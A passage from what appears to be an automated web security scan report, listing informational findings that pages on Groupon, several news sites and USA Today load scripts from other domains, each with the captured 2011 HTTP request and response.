<script src="http://assets1.grouponcdn.com/javascripts/dev/jquery.validate.js?QDTFjlfJ" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/common/jquery.md5.js?Oz7bVl92" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/common/finch.js?h-HfaZ3f" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/common/groupon_finch.js?lcGEDV4e" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://assets1.grouponcdn.com/assets/application.js?OxIWiUVz" type="text/javascript"></script>
...[SNIP]...
<![endif]-->
<script src="http://assets1.grouponcdn.com/javascripts/views/demographics.js?corQwi_S" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/app/learn/fader.js?FXhvj5RB" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://assets1.grouponcdn.com/assets/facebook.js?K2umkWBs" type="text/javascript"></script>
...[SNIP]...

18.42. http://www.groupon.com/mobile

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.groupon.com
Path:   /mobile

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /mobile HTTP/1.1
Host: www.groupon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; _chartbeat2=gzdl5mb0frlvfs2p; NREUM=s=1304955365968; visited=visit_1; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.6.9.1304955489618; adchemy_id=; division=dallas; _thepoint=8dd18fc853ae097ffe774ef38887ee55

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Mon, 09 May 2011 15:38:38 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:38:38 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:38:38 GMT; HttpOnly
Status: 200
ETag: "0b5465a4051743e698e7fc66860eed29"
X-Runtime: 94
Cache-Control: private, max-age=0, must-revalidate
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->
<
...[SNIP]...
</script>

<script src="http://assets1.grouponcdn.com/javascripts/common/groupon_finch_init.js?m321rSc4" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/dev/jquery.validate.js?QDTFjlfJ" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/common/jquery.md5.js?Oz7bVl92" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/common/finch.js?h-HfaZ3f" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/common/groupon_finch.js?lcGEDV4e" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://assets1.grouponcdn.com/assets/application.js?OxIWiUVz" type="text/javascript"></script>
...[SNIP]...
<![endif]-->

<script src="http://assets1.grouponcdn.com/assets/facebook.js?K2umkWBs" type="text/javascript"></script>
...[SNIP]...

18.43. http://www.groupon.com/privacy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.groupon.com
Path:   /privacy

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /privacy HTTP/1.1
Host: www.groupon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; adchemy_id=q4; conversion_val=; _tpmed=cpc; _tpcid=q4; division=dallas; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; _thepoint=8dd18fc853ae097ffe774ef38887ee55; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.2.9.1304955341313

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Mon, 09 May 2011 15:35:45 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:35:44 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:35:45 GMT; HttpOnly
Status: 200
ETag: "674d83fb859dfa126fff53b15ed631d0"
X-Runtime: 734
Cache-Control: private, max-age=0, must-revalidate
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->
<
...[SNIP]...
</script>

<script src="http://assets1.grouponcdn.com/javascripts/common/groupon_finch_init.js?m321rSc4" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/dev/jquery.validate.js?QDTFjlfJ" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/common/jquery.md5.js?Oz7bVl92" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/common/finch.js?h-HfaZ3f" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/common/groupon_finch.js?lcGEDV4e" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://assets1.grouponcdn.com/assets/application.js?OxIWiUVz" type="text/javascript"></script>
...[SNIP]...
<![endif]-->

<script src="http://assets1.grouponcdn.com/assets/facebook.js?K2umkWBs" type="text/javascript"></script>
...[SNIP]...

18.44. http://www.groupon.com/rounded_bottom.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.groupon.com
Path:   /rounded_bottom.png

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /rounded_bottom.png HTTP/1.1
Host: www.groupon.com
Proxy-Connection: keep-alive
Referer: http://www.groupon.com/learn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; _chartbeat2=gzdl5mb0frlvfs2p; NREUM=s=1304955365968; visited=visit_1; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.6.9.1304955489618; adchemy_id=; division=dallas; _thepoint=8dd18fc853ae097ffe774ef38887ee55

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Content-Type: text/html
Date: Mon, 09 May 2011 15:38:38 GMT
Expires: Mon, 09 May 2011 15:38:48 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->
<
...[SNIP]...
</script>

<script src="http://assets1.grouponcdn.com/javascripts/common/groupon_finch_init.js?m321rSc4" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/dev/jquery.validate.js?QDTFjlfJ" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/common/jquery.md5.js?Oz7bVl92" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/common/finch.js?h-HfaZ3f" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/common/groupon_finch.js?lcGEDV4e" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://assets1.grouponcdn.com/assets/application.js?OxIWiUVz" type="text/javascript"></script>
...[SNIP]...
<![endif]-->

<script src="http://assets1.grouponcdn.com/assets/facebook.js?K2umkWBs" type="text/javascript"></script>
...[SNIP]...

18.45. http://www.groupon.com/subscriptions/new

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.groupon.com
Path:   /subscriptions/new

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /subscriptions/new?utm_source=mbe&utm_medium=cpc&utm_campaign=q4&utm_content=2s208&p={site}&a=Banner&s=1x1 HTTP/1.1
Host: www.groupon.com
Proxy-Connection: keep-alive
Referer: http://share.meebo.com/cim/whitev4.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Mon, 09 May 2011 15:35:34 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: utm_campaign=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: utm_content=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpref=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpmed=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: b=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: utm_term=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpref2=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: utm_medium=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: referred_at=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: external_uid=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: utm_source=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpoid=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpcid=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpuid=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpaid=mbe; domain=.groupon.com; path=/; expires=Mon, 16-May-2011 15:35:34 GMT
Set-Cookie: _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; domain=.groupon.com; path=/; expires=Mon, 16-May-2011 15:35:34 GMT
Set-Cookie: adchemy_id=q4; path=/
Set-Cookie: conversion_val=; path=/
Set-Cookie: _tpmed=cpc; domain=.groupon.com; path=/; expires=Mon, 16-May-2011 15:35:34 GMT
Set-Cookie: _tpcid=q4; domain=.groupon.com; path=/; expires=Mon, 16-May-2011 15:35:34 GMT
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:35:34 GMT
Set-Cookie: b=fb20b364-7a51-11e0-a127-005056926ae9; path=/; expires=Sun, 09-May-2021 15:35:34 GMT
Set-Cookie: s=fb20c0ac-7a51-11e0-a127-005056926ae9; path=/
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=5ab241eb06d51f105c0c22a038766fce; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:35:34 GMT; HttpOnly
Status: 200
ETag: "52f175b7121fc6cae943527725d56424"
X-S-COOKIE: fb20c0ac-7a51-11e0-a127-005056926ae9
X-B-COOKIE: fb20b364-7a51-11e0-a127-005056926ae9
X-Runtime: 80
Cache-Control: private, max-age=0, must-revalidate
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xmlns='http://www
...[SNIP]...
</script>
<script src="http://www.googleadservices.com/pagead/conversion.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/assets/subscriptions.js?kWgEDV5U" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/app/subscriptions/multi_steps.js?1nuXIT24" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/dev/jquery.validate.js?QDTFjlfJ" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/app/subscriptions/alerts.js?IrgXe2LC" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/app/subscriptions/disable_on_submit.js?-rDwJEm-" type="text/javascript"></script>
...[SNIP]...

18.46. https://www.groupon.com/login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.groupon.com
Path:   /login

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /login HTTP/1.1
Host: www.groupon.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; adchemy_id=q4; conversion_val=; _tpmed=cpc; _tpcid=q4; division=dallas; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; _thepoint=8dd18fc853ae097ffe774ef38887ee55; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.2.9.1304955341313

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:35:57 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:35:57 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:35:57 GMT; HttpOnly
Status: 200
ETag: "43fe666874ea7a2ba3c418d3a85b9227"
X-Runtime: 85
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 36760

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->
<
...[SNIP]...
</script>

<script src="https://secure-assets.grouponcdn.com/javascripts/common/groupon_finch_init.js?m321rSc4" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js" type="text/javascript"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js" type="text/javascript"></script>
<script src="https://secure-assets.grouponcdn.com/javascripts/dev/jquery.validate.js?QDTFjlfJ" type="text/javascript"></script>
<script src="https://secure-assets.grouponcdn.com/javascripts/common/jquery.md5.js?Oz7bVl92" type="text/javascript"></script>
<script src="https://secure-assets.grouponcdn.com/javascripts/common/finch.js?h-HfaZ3f" type="text/javascript"></script>
<script src="https://secure-assets.grouponcdn.com/javascripts/common/groupon_finch.js?lcGEDV4e" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="https://secure-assets.grouponcdn.com/assets/application.js?OxIWiUVz" type="text/javascript"></script>
...[SNIP]...
<![endif]-->
<script src="https://secure-assets.grouponcdn.com/javascripts/common/focus.js?dCvk55U3" type="text/javascript"></script>
<script src="https://secure-assets.grouponcdn.com/assets/facebook.js?K2umkWBs" type="text/javascript"></script>
...[SNIP]...

18.47. https://www.groupon.com/users/new

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.groupon.com
Path:   /users/new

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /users/new HTTP/1.1
Host: www.groupon.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; NREUM=s=1304955348574; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.3.9.1304955341313; _chartbeat2=gzdl5mb0frlvfs2p; adchemy_id=; division=dallas; _thepoint=8dd18fc853ae097ffe774ef38887ee55

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:36:08 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:36:07 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:36:08 GMT; HttpOnly
Status: 200
ETag: "bac993c076753d5871cf9db400d8c856"
X-Runtime: 612
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 36677

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->
<
...[SNIP]...
</script>

<script src="https://secure-assets.grouponcdn.com/javascripts/common/groupon_finch_init.js?m321rSc4" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js" type="text/javascript"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js" type="text/javascript"></script>
<script src="https://secure-assets.grouponcdn.com/javascripts/dev/jquery.validate.js?QDTFjlfJ" type="text/javascript"></script>
<script src="https://secure-assets.grouponcdn.com/javascripts/common/jquery.md5.js?Oz7bVl92" type="text/javascript"></script>
<script src="https://secure-assets.grouponcdn.com/javascripts/common/finch.js?h-HfaZ3f" type="text/javascript"></script>
<script src="https://secure-assets.grouponcdn.com/javascripts/common/groupon_finch.js?lcGEDV4e" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="https://secure-assets.grouponcdn.com/assets/application.js?OxIWiUVz" type="text/javascript"></script>
...[SNIP]...
<![endif]-->

<script src="https://secure-assets.grouponcdn.com/assets/facebook.js?K2umkWBs" type="text/javascript"></script>
...[SNIP]...

18.48. http://www.hnedata.net/features/tr_stock_charts

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hnedata.net
Path:   /features/tr_stock_charts

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /features/tr_stock_charts HTTP/1.1
Host: www.hnedata.net
Proxy-Connection: keep-alive
Referer: http://www.therepublic.com/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:09 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.17
Expires: 0
cache-control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: FreakAuth=5518e37387eae06696e574f8c1f4da91; expires=Mon, 09-May-2011 17:37:33 GMT; path=/
Last-Modified: Mon, 09 May 2011 15:37:09 GMT
Content-Type: text/html
Content-Length: 1583


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>The Republic<
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" />


<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
<div style="width:300px;height:148px;overflow:hidden"><script src="http://www.macroaxis.com/widgets/url.jsp?t=26&s=NYA,IXIC,GSPC"></script>
...[SNIP]...

18.49. http://www.natchezdemocrat.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.natchezdemocrat.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.natchezdemocrat.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=124195861.1304954844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=124195861.1072315151.1304954844.1304954844.1304954844.1; __utmc=124195861; __utmb=124195861.1.10.1304954844

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:17 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Last-Modified: Mon, 09 May 2011 15:36:27 GMT
Vary: Accept-Encoding,Cookie
Expires: Mon, 09 May 2011 16:36:27 GMT
Pragma: public
Cache-Control: public, must-revalidate, proxy-revalidate
Etag: 9f7d4ebf4b1f290977c44ce93671a199
X-Pingback: http://www.natchezdemocrat.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 57842

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><meta
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://www.natchezdemocrat.com/wp-content/plugins/Barometer/files/rBarStyles.css" /> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" ></script>
...[SNIP]...
<div class="ad300x noAd"> <script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'></script>
...[SNIP]...
<div class="ad190x90" style="float:right;margin-right:10px;"> <script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'></script>
...[SNIP]...
<div class="ad728x90"> <script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'></script>
...[SNIP]...
<div class="ad300x"> <script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'></script>
...[SNIP]...
<div class="ad300x"> <script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'></script>
...[SNIP]...
<div class="ad300x noAd"> <script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'></script>
...[SNIP]...
<div class="ad300x ads"> <script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'></script>
...[SNIP]...
<div class="ad728x90"> <script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'></script>
...[SNIP]...

18.50. http://www.therepublic.com/home/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.therepublic.com
Path:   /home/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /home/ HTTP/1.1
Host: www.therepublic.com
Proxy-Connection: keep-alive
Referer: http://www.therepublic.com/login/process/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=091f1945bf1276a9:T=1304954797:S=ALNI_MaYgzrxiz6jweMA989XDyouR2mntw; _chartbeat2=7enfaz2ubdno12gi; FreakAuth=423b87089976e0474ec7fcf078c4204a

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:04 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.17
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Content-Type: text/html
Content-Length: 64489

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd">
<head>
   <meta name="google-site-verification" content="rDoJHMU_Kg8iBXy4lutSBUULkgdb6uCJc0BnDPddbts
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<!-- Start Quantcast tag -->
<script type="text/javascript" src="http://edge.quantserve.com/quant.js" async></script>
...[SNIP]...

18.51. http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usatoday.com
Path:   /weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm HTTP/1.1
Host: www.usatoday.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
